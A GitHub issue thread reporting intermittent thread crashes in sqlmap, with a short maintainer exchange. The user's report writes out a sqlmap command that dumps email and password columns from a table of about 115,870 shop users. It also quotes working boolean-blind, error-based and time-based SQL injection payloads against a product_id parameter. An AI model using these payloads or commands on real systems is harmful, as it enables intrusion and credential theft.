### ISSUE TITLE
Multi-threading seems to only work sometimes. 

### ISSUE THREAD

**Issue by masecla22** [sqlmapproject/sqlmap#3485]
## What's the problem (or question)?
The program crashes instead of dumping when using multiple threads. Only works sometimes. See Logs below.
## Do you have an idea for a solution?
I rebooted my Ubuntu and sometimes it works, sometimes not. i think it has to do something with syncing up threads?
## How can we reproduce the issue?
1. Run sqlmap
2. Run the following command 
3../sqlmap.py -u "my url" --dbms=MySQL --random-agent -D glb -T icart_users -C email,password --dump --threads 5
4. When asked about speed > consistency I select no
I get this
```
[13:00:57] [INFO] used SQL query returns 115870 entries
due to huge table size do you want to remove ORDER BY clause gaining speed over consistency? [y/N] N
[13:00:59] [INFO] starting 5 threads
[13:00:59] [ERROR] thread 4: 608359859222893350
[13:00:59] [ERROR] thread 3: 608359859222893350
[13:00:59] [ERROR] thread 1: 608359859222893350
[13:00:59] [ERROR] thread 0: 608359859222893350
[13:00:59] [ERROR] thread 2: 608359859222893350
```

## What are the running context details?
* Fresh OS (Ubuntu 18 fresh Python as well)
* 2 GB ram
* Single core
* 20 GB space
* Payload
```
---
Parameter: product_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: product_id=135797' AND 3035=3035 AND 'IfyG'='IfyG

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: product_id=135797' AND (SELECT 1347 FROM(SELECT COUNT(*),CONCAT(0x716b767671,(SELECT (ELT(1347=1347,1))),0x7178707871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Fvdf'='Fvdf

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: product_id=135797' AND SLEEP(5) AND 'WNMn'='WNMn
---
```

**Comment by stamparm** [comment]
Are you running latest revision? Yesterday I pushed a related patch

**Comment by masecla22** [comment]
I installed sqlmap today

**Comment by masecla22** [comment]
So basically yeah, the latest version.
